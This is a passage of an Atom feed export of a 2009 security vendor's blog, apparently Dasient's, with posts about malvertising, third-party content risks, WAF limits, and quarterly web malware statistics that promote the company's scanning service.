&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;span class="Apple-style-span"  style="font-family:arial;"&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;span class="Apple-style-span"  style="font-family:arial;"&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;Other new updates include significant upgrades to the overall speed and reliability of the Dasient WAM scanning technology, as well as the ability to scan customer sites for links to dangerous downloads that might be placed in user-generated content or in syndicated ads on those sites.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;span class="Apple-style-span"  style="font-family:arial;"&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;span class="Apple-style-span"  style="font-family:arial;"&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;We've also launched a redesign of &lt;a href="http://dasient.com/"&gt;Dasient.com&lt;/a&gt; that features some new resources for current and potential customers. Head &lt;a href="http://wam.dasient.com/wam/whydasient_threat"&gt;here&lt;/a&gt; to learn a little more about web-based malware and the threat it poses to businesses and site owners of all types and sizes. Or check out some of our customer testimonials, to hear firsthand how Dasient WAM helped them. 
We also have a new &lt;a href="http://www.dasient.com/resources/dasient_white_paper.pdf"&gt;whitepaper&lt;/a&gt; on drive-by downloads and other web-based malware threats.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;span class="Apple-style-span"  style="font-family:arial;"&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;span class="Apple-style-span"  style="font-family:arial;"&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;To learn more about how Dasient WAM can help you protect yourself from the threat of web-based malware -- and the attendant loss of traffic, decline in revenue, and damage to brand equity -- check out our &lt;a href="http://wam.dasient.com/wam/products_overview"&gt;product page&lt;/a&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-405197892972891734?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/405197892972891734/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2009/12/dasient-wam-monitoring-and-diagnostic.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/405197892972891734'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/405197892972891734'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2009/12/dasient-wam-monitoring-and-diagnostic.html' title='Dasient WAM monitoring and diagnostic services now 
OOB'/><author><name>Ameet</name><uri>http://www.blogger.com/profile/18432893671270222537</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='17772997342166647868'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-5032170752839661172</id><published>2009-11-25T09:15:00.001-08:00</published><updated>2009-11-25T09:20:24.201-08:00</updated><title type='text'>Another step forward in the fight against malvertising</title><content type='html'>&lt;span class="Apple-style-span" style="font-family: Verdana; font-size: 13px; "&gt;&lt;span style="font-family: arial, sans-serif; "&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;span style="background-color: rgb(255, 255, 255); "&gt;Last week, Google &lt;/span&gt;&lt;a id="lkd9" href="http://www.businessinsider.com/google-cracks-down-on-scammy-advertisers-2009-11" title="announced" style="color: rgb(85, 26, 139); "&gt;&lt;span style="background-color: rgb(255, 255, 255); "&gt;announced&lt;/span&gt;&lt;/a&gt;&lt;span style="background-color: rgb(255, 255, 255); "&gt; that it will now be taking a zero-tolerance approach to dealing with advertisers that place ads that violate its terms of service, including malicious ads that can infect users with malware. Google had previously been removing these ads from its network as it identified them; it will now be permanently disabling the AdWords accounts of the advertisers that put those ads into its network. 
This new policy shift should force individual advertisers and affiliates to think twice before placing malicious ads with Google, but hopefully it will also start to make an impact in addressing the broader malvertising threat.&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;br /&gt;&lt;/div&gt;To provide some context, the quality and safety of ads have been a concern for users, publishers, advertisers, and technology companies since advertising first appeared on the web more than a dozen years ago. Some of the first ads embedded in webpages took the form of banners -- some of which were criticized for the bandwidth that they required when most of the world was still using dial-up modems to access the Internet, and for their "loudness." &lt;br /&gt;&lt;br /&gt;As companies such as Sun and Netscape worked together to bring more interactive forms of content and ads to browsers, sandboxes like the Java Virtual Machine were introduced to protect users from potentially malicious interactive content. In parallel to the development of Java, other forms of interactivity were brought to market, including JavaScript, ActiveX, Flash, and Shockwave, and different levels of security and interactivity distinguish these technologies. Some of them leverage browser "plugins" that run code natively and in an unrestricted fashion on the user's machine (such as ActiveX), while others employ sandboxes in an attempt to protect users (though not always effectively). 
Often, functionality wins out over security when developers are faced with the pressing market needs of advertisers and content publishers, leading to much more frequent use of technologies that are more interactive but less safe than technologies that are less interactive but more safe.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-family: arial, sans-serif; "&gt;As a result, we today have a world where attackers interested in harming users with malicious ads can take advantage of a large variety of vulnerabilities in browsers, plugins, and operating systems to do so. Here at Dasient, we've seen a significant increase in the amount of malvertising activity in the last year, and have worked with a number of companies and site owners who have been impacted by it. Some of these sites' users were infected by malicious ads; others ended up on the unsafe-site blacklists maintained by search engines, browsers, and anti-virus companies. Either way, the sites ended up losing traffic, revenue, and brand equity because a malicious ad popped up on their site via a syndicated ad network.&lt;br /&gt;&lt;br /&gt;We're optimistic that Google's new policy shift will inspire similar moves from other online ad syndicators, and that in turn the advertisers and affiliates who traffic in malicious ads will have fewer channels to distribute their wares. Some &lt;a id="r1hi" href="http://www.thebigmoney.com/articles/0s-1s-and-s/2009/11/17/google-does-non-evil-thing-bans-white-teeth-flat-stomachs?page=0,0" title="commenters" style="color: rgb(85, 26, 139); "&gt;commentators&lt;/a&gt; are already arguing that it won't; that not everyone can afford to take Google's principled stand. We hope that's not the case, but either way, it'll likely take a long time to stamp this threat out altogether. 
In the meantime, businesses and site owners interested in protecting their users and their reputation on the web can take advantage of tools like Dasient Web Anti-Malware (WAM), which regularly monitors your site and provides you with immediate alerts and detailed diagnostic information as soon as an infection or a malicious ad is detected.&lt;/span&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;span style="font-family: arial, sans-serif; "&gt;To learn more about Dasient WAM, check out &lt;a id="cbmo" href="http://wam.dasient.com/wam/products" title="this page" style="color: rgb(85, 26, 139); "&gt;this page&lt;/a&gt;. And for all the latest news on web-based malware and the security space in general, be sure to follow us on Twitter at &lt;a href="http://twitter.com/dasient" style="color: rgb(85, 26, 139); "&gt;http://twitter.com/dasient&lt;/a&gt;.&lt;/span&gt;&lt;/div&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-5032170752839661172?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/5032170752839661172/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2009/11/another-step-forward-in-fight-against.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/5032170752839661172'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/5032170752839661172'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2009/11/another-step-forward-in-fight-against.html' title='Another step forward in the fight against malvertising'/><author><name>Neil 
Daswani</name><uri>http://www.blogger.com/profile/02845151886396994390</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='02016048081221183427'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-7693234508200024961</id><published>2009-11-16T18:21:00.000-08:00</published><updated>2009-11-17T00:24:39.022-08:00</updated><title type='text'>Structural vulnerabilities, and the importance of being prepared</title><content type='html'>&lt;span class="Apple-style-span" style=";font-family:Verdana;font-size:13;"  &gt;&lt;div style="margin-top: 0px; margin-bottom: 0px;"&gt;Interesting &lt;a id="od3-" href="http://news.google.com/news/more?pz=1&amp;amp;cf=all&amp;amp;cf=all&amp;amp;ncl=dQIFPghq8wfPUzMMz6oJgv6aY_57M" title="story" style="color: rgb(85, 26, 139);"&gt;story&lt;/a&gt; in the media late last week, with several articles detailing a newly discovered vulnerability created by the origin policies for third-party Flash objects embedded on sites. This vulnerability is especially serious, as it's structural in nature -- meaning that it stems from the way this third-party content is actually embedded in sites, rather than from a software hole that can be patched. There is no simple solution for closing this vulnerability.&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px;"&gt;As the web grows increasingly interdependent -- with web companies and site owners sourcing in more and more content and applications from each other and from users -- these structural vulnerabilities will only continue to grow in variety and number. At present, they include sourcing in third-party content or applications; enabling users to add content like comments, links, photos, and other files; and employing syndicated ad networks, among other things. 
These vulnerabilities are already relatively widespread: For example, 66 percent of the top 500 sites in the US &lt;a href="http://www.quantcast.com/top-sites-1"&gt;run ads&lt;/a&gt;, 47 percent of the top 100 accept &lt;a id="mr6n" href="http://www.networkworld.com/news/2009/091609-websense-malware-user-comments.html" title="user-generated content" style="color: rgb(85, 26, 139);"&gt;user-generated content&lt;/a&gt;, and &lt;a id="sg7s" href="http://www.techcrunch.com/2008/12/18/study-newspaper-websites-are-still-figuring-out-this-whole-conversation-thing/" title="75 percent" style="color: rgb(85, 26, 139);"&gt;75 percent&lt;/a&gt; of the top 100 newspapers in the US enable user comments. &lt;/div&gt;&lt;br /&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px;"&gt;These vulnerabilities open sites up to a number of potential exploits, not least of which is being turned into a delivery vehicle for malware, wherein a site inadvertently infects some or all of its visitors with malicious software. This can in turn trigger losses in traffic, reputation, and revenue, as visitors discover the infections and as the site is evaluated by the search engines, browsers, and AV providers that blacklist dangerous sites. And since these vulnerabilities are structural, there's often no way to "close" them. In other words, there's nothing site owners can do to guarantee that they won't be exploited, other than abandon things like third-party content and ad networks altogether (which, for most sites, isn't much of an option).&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px;"&gt;So what can site owners who rely on elements of the interdependent web do to reduce the likelihood that their site will be compromised? At Dasient, we believe that a fast, scalable scanning and diagnostic service is an increasingly crucial part of any defense strategy. 
In the last few months alone, we've seen a &lt;a id="wwpk" href="http://blog.dasient.com/2009/10/new-q309-malware-data-and-dasient.html" title="staggering increase" style="color: rgb(85, 26, 139);"&gt;significant increase&lt;/a&gt; in the number of sites that are being compromised and turned into delivery vehicles for malware. Now more than ever, site owners need to be able to quickly locate and address any bad code that finds its way onto their sites.&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px;"&gt;To learn more about how Dasient's Web Anti-Malware service might be able to help you, check out &lt;a id="f7.n" href="http://wam.dasient.com/wam/products" title="this page" style="color: rgb(85, 26, 139);"&gt;this page&lt;/a&gt;.&lt;/div&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-7693234508200024961?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/7693234508200024961/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2009/11/structural-vulnerabilities-and.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/7693234508200024961'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/7693234508200024961'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2009/11/structural-vulnerabilities-and.html' title='Structural vulnerabilities, and the importance of being prepared'/><author><name>Ameet</name><uri>http://www.blogger.com/profile/18432893671270222537</uri><email>noreply@blogger.com</email><gd:extendedProperty 
xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='17772997342166647868'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-1012347005425692652</id><published>2009-11-05T08:26:00.000-08:00</published><updated>2009-11-05T08:49:13.433-08:00</updated><title type='text'>For malware attacks, WAFs need to be complemented by WAM</title><content type='html'>Dmitry Evteev of Positive Technologies recently &lt;a title="posted about a method to bypass web application firewalls" href="http://ptresearch.blogspot.com/2009/11/another-fine-method-to-exploit-sql.html" target="_blank"&gt;posted about a method to bypass web application firewalls&lt;/a&gt; (like mod-security) to mount SQL injection attacks.&lt;br /&gt; &lt;br /&gt;While &lt;a title="web application firewalls" href="http://www.owasp.org/index.php/Web_Application_Firewall" target="_blank"&gt;web application firewalls&lt;/a&gt; (or WAFs) play an important role in a &lt;a title="defense-in-depth strategy" href="http://en.wikipedia.org/wiki/Defense_in_Depth_%28computing%29" target="_blank"&gt;defense-in-depth strategy&lt;/a&gt;, the post highlights why businesses cannot rely solely on preventative technologies like WAFs to secure their websites from attacks, particularly web-based malware attacks.&lt;br /&gt;&lt;br /&gt;For one, as the article and the comments demonstrate, WAFs require configuration and ongoing maintenance of software and rulesets to prevent the latest attacks. 
If the WAF is running out-of-date software or rulesets, or if the administrator has improperly configured the device, it will not be able to prevent attacks like the one &lt;a title="detailed in the blog post" href="http://ptresearch.blogspot.com/2009/11/another-fine-method-to-exploit-sql.html" target="_blank"&gt;detailed in Dmitry's post&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Second, there will always be new types of attacks and new vulnerabilities that attackers can exploit to inject malicious code onto websites. WAFs can enforce security policies based on signatures of known attacks, but they cannot necessarily prevent &lt;a title="&amp;quot;zero-day&amp;quot; attacks" href="http://en.wikipedia.org/wiki/Zero_day_attack" target="_blank"&gt;"zero-day" attacks&lt;/a&gt; that look like normal traffic.&lt;br /&gt; &lt;br /&gt;Finally, not all malware attacks exploit web application vulnerabilities to place malware on websites. For example, the Gumblar attack from earlier this year &lt;a title="relied on compromised FTP credentials" href="http://blog.trendmicro.com/stolen-ftp-credentials-key-to-gumblar-attack/" target="_blank"&gt;relied on compromised FTP credentials&lt;/a&gt; to infect sites. &lt;a title="Recent malvertising attacks" href="http://www.guardian.co.uk/technology/2009/sep/25/malvertising" target="_blank"&gt;Recent malvertising attacks&lt;/a&gt; have taken advantage of syndicated ad networks to display malicious ads on legitimate publisher sites. &lt;a title="In a study by Google" href="http://news.bbc.co.uk/2/hi/technology/6645895.stm" target="_blank"&gt; A recent study by Google&lt;/a&gt; discovered that "the [malicious] code was often contained in those parts of the website not designed or controlled by the website owner, such as banner adverts and widgets... Widgets are small programs that may, for example, display a calendar on a webpage or a web traffic counter. 
These are often downloaded from third-party sites."&lt;br /&gt;&lt;br /&gt;Security professionals tend to invest heavily in "preventative" solutions, but underinvest in technologies to detect and remediate problems when they (inevitably) occur. WAFs can help "raise the bar," making it more difficult for attackers to infect a legitimate website. However, given that attackers can circumvent preventative technologies like WAFs, businesses cannot rely on WAFs alone to secure themselves from malware attacks. To provide true defense-in-depth, WAFs must be complemented by services like &lt;a title="Dasient Web Anti-Malware" href="http://wam.dasient.com/wam/" target="_blank"&gt;Dasient Web Anti-Malware (WAM)&lt;/a&gt; that automatically monitor websites for infections and remediate them when they occur.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-1012347005425692652?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/1012347005425692652/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2009/11/for-malware-attacks-wafs-need-to-be.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/1012347005425692652'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/1012347005425692652'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2009/11/for-malware-attacks-wafs-need-to-be.html' title='For malware attacks, WAFs need to be complemented by WAM'/><author><name>Ameet</name><uri>http://www.blogger.com/profile/18432893671270222537</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' 
value='17772997342166647868'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-5430499141843332675</id><published>2009-10-27T08:00:00.000-07:00</published><updated>2009-10-27T14:26:50.099-07:00</updated><title type='text'>New Q3'09 malware data, and the Dasient Infection Library</title><content type='html'>&lt;div style="text-align: left;"&gt;&lt;span class="Apple-style-span" style="font-style: italic; "&gt;&lt;i&gt;Ed. Note: The data in this post is drawn primarily from Dasient's proprietary malware analysis platform, which gathers data on web-based malware attacks from across the web and in the last six months has been used to help tens of thousands of site owners address their web-based malware issues. This is the first in a series of regular reports on these trends.&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;As we've discussed in this space before, we are seeing a fundamental shift in how malware is being distributed: Attackers are focusing more than ever on compromising legitimate websites and using them to distribute malware. As a result, more and more sites are feeling the effects of web-based malware infection, which can include loss of traffic, decline in revenue, and damage to brand equity. &lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;This trend is underlined by the data we've gathered on the third quarter of 2009, which saw significant activity on the web-based malware front. During that span, Dasient identified more than 52,000 web-based malware infections, making for a total of more than 72,000 unique malware infections identified and catalogued since our malware analysis platform launched. &lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Based on the telemetry data we've gathered from the web, we estimate that more than 640,000 sites and approximately 5.8 million pages were infected in the quarter. 
This is a substantial increase from data &lt;a href="http://www.microsoft.com/presspass/newsroom/security/factsheets/04-08SIRv6FS.mspx"&gt;published&lt;/a&gt; by Microsoft in April 2009, which pegged the number of infected pages per quarter at a little more than 3 million. This increased activity is also reflected in the rapid growth of the &lt;a href="http://blog.dasient.com/2009/07/how-does-web-page-harm-thee-let-me.html"&gt;blacklists&lt;/a&gt; maintained by search engines, browsers, and anti-virus software companies. The Google blacklist alone has &lt;a href="http://googleonlinesecurity.blogspot.com/2009/08/malware-statistics-update.html"&gt;more than doubled&lt;/a&gt; in the last year, and at certain points has been adding 40,000 new sites per week.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;This shift has been accelerated by the fact that using legitimate sites as a delivery method enables attackers to infect large numbers of endpoints at once, and by the trend toward increasing complexity in and interoperability between websites and web applications (which is in turn opening up more and more attack surfaces).  &lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;b&gt;Substantial portions of sites being infected&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;While it often takes only a couple of infected pages to harm users or land a site on one of the many blacklists, our research suggests that when sites are infected, the bad code is installed on a significant portion of the pages on those sites. In Q3'09, the infections on newly compromised sites of 10 pages or more spread to an average of 19% of those sites' pages. &lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;This number is significant for a couple of reasons. For one, the greater the percentage of a site that's infected, the greater the chances are that the site will spread malware to users or be flagged by a blacklist provider. 
For another, modern web-based malware infections are frequently complex and heavily obfuscated, making it a challenge even for experienced webmasters to identify all the bad code on the site and remove it. The more infected pages there are on the site, the longer it can take to address the infection. And if the site has already been blacklisted (which is often the case), then the site will take a hit in traffic, reputation, and revenue with each day that passes during the cleanup and blacklist appeal process.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;b&gt;High reinfection rate&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Another trend worth noting from Q3 is the high reinfection rate for sites, which came in at 39.6%. There are a number of factors that could contribute to a high reinfection rate, including the tendency for attackers to look for attack vectors common to large numbers of sites and then develop automated attack scripts that will repeatedly seek out those vectors and exploit them.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;The sheer number of available attack vectors likely also plays a part. Common attack vectors include compromised FTP credentials, server-side vulnerabilities, unpatched or unknown web application vulnerabilities, and syndicated ad networks serving malicious ads. 
With attackers embracing scale and automation, and with so many ways for even well-secured sites to be compromised, it's becoming more and more important for site owners to employ tools that can help them regularly monitor their sites for infection and quickly address any issues that arise.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;b&gt;New attack techniques&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;As you can see in the graph below, the vast majority of the web-based malware attacks in Q3 could be classified as JavaScript (54.8%) and iFrame (37.1%) attacks, with "other" attacks accounting for only 8.1%. &lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 238); -webkit-text-decorations-in-effect: underline; "&gt;&lt;img src="http://4.bp.blogspot.com/_VTOwWLvbLPY/SuZgxzfsKqI/AAAAAAAACF8/fai36fnzvjI/s320/InfectionTypeBreakdown.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5397107612203100834" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 320px; height: 192px; " /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;One of the challenging things about trying to protect sites from the threat of web-based malware is that the attacks often evolve very quickly and make use of a number of obfuscation techniques to evade traditional malware scanners. 
We saw plenty of this activity in Q3, with some notable recent examples being &lt;a href="http://wam.dasient.com/wam/diagnose?URL=m-antonik.com&amp;amp;scan_id=101101"&gt;dynamically generating the SRC attribute&lt;/a&gt; in iFrames to foil scanners that inspect static SRC attributes; &lt;a href="http://wam.dasient.com/wam/diagnose.php?URL=www.jinpengsh.com%2F&amp;amp;scan_id=100853"&gt;using partially or fully encoded URLs&lt;/a&gt; to frustrate scanners that match URLs with regular expressions; and &lt;a href="http://wam.dasient.com/wam/infection_library?md5=0facca45ae31a333256c7787b2c0b5e3"&gt;adding phrases like "analytics-google"&lt;/a&gt; to malicious code to fool webmasters into thinking the code is legitimate.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;b&gt;Dasient to open up web-based malware Infection Library&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;The Dasient Web Anti-Malware (WAM) service regularly monitors our customers' sites for signs of a web-based malware infection. When an infection is detected, it notifies the customer immediately, providing full diagnostic information on the infection. It can also automatically strip out the bad code from infected pages before they're served to the site's users -- keeping those users safe and keeping the site off the blacklist. We're proud to be able to provide this service to our customers, and have received great feedback since launching earlier this year.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;But as the threat of web-based malware continues to grow, one of the things we're hearing from the web, security, and IT professionals we work with is that they need more information to help them keep track of the threat and ensure that they have the tools they need to address it. 
With that in mind, we will now start providing these professionals with a view into the Dasient &lt;a href="http://wam.dasient.com/wam/infection_library_index"&gt;Infection Library&lt;/a&gt;, which in just a few months has accumulated data on more than 70,000 different web-based malware infections.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 238); -webkit-text-decorations-in-effect: underline; "&gt;&lt;img src="http://4.bp.blogspot.com/_VTOwWLvbLPY/SuZhNSiyIMI/AAAAAAAACGE/3ZBzqEdaGIs/s320/screenshot.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5397108084394041538" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 320px; height: 302px; " /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;To start, we'll be providing information on the top 10 web-based malware attacks for the week, as well as some other basic trend information on the latest attacks. We'll also be publishing relatively new infections that our platform finds to a &lt;a href="http://www.twitter.com/dasient_new_mal"&gt;dedicated Twitter feed&lt;/a&gt;. We hope to expand the view we offer into our Infection Library in the future, and are looking forward to your feedback on the kinds of data and functionality you'd find useful.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;If you're a business owner and you'd like to learn more about how Dasient WAM can help protect your business, head &lt;a href="http://wam.dasient.com/wam/products"&gt;here&lt;/a&gt;. If you're a web hosting provider and you'd like to learn about partnership opportunities with Dasient, check out &lt;a href="http://wam.dasient.com/wam/partners"&gt;this page&lt;/a&gt;. 
And no matter who you are, please be sure to check out our Twitter feed at &lt;a href="http://twitter.com/dasient"&gt;http://twitter.com/dasient&lt;/a&gt; for all the latest in web-based malware and general security news.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-5430499141843332675?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/5430499141843332675/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2009/10/new-q309-malware-data-and-dasient.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/5430499141843332675'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/5430499141843332675'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2009/10/new-q309-malware-data-and-dasient.html' title='New Q3&apos;09 malware data, and the Dasient Infection Library'/><author><name>Ameet</name><uri>http://www.blogger.com/profile/18432893671270222537</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='17772997342166647868'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_VTOwWLvbLPY/SuZgxzfsKqI/AAAAAAAACF8/fai36fnzvjI/s72-c/InfectionTypeBreakdown.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-708370654571515279</id><published>2009-10-13T14:55:00.001-07:00</published><updated>2009-10-13T17:28:36.909-07:00</updated><title type='text'>More industry attention on web-based 
malware</title><content type='html'>&lt;span class="Apple-style-span"   style="  ;font-family:Verdana;font-size:13px;"&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Yesterday, Google &lt;/span&gt;&lt;a id="f-ea" href="http://googleonlinesecurity.blogspot.com/2009/10/show-me-malware.html" title="announced" style="color: rgb(85, 26, 139); "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;announced&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; that it plans to start providing owners of malware-infected sites with samples of the bad code that its scanners have uncovered. This new functionality is launching as an experimental feature in Webmaster Tools, and as I mentioned in the &lt;/span&gt;&lt;a id="mwmi" href="http://blog.dasient.com/2009/08/dasient-co-founder-neil-daswani-gives.html" title="talk"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;talk&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; I gave at Google this past July, we're excited to be working in concert with Google and others to tackle the threat of web-based malware and help make the web a safer place overall.&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;This announcement clearly underlines the growing need for this kind of information and for new tools to help site owners protect themselves and their users. 
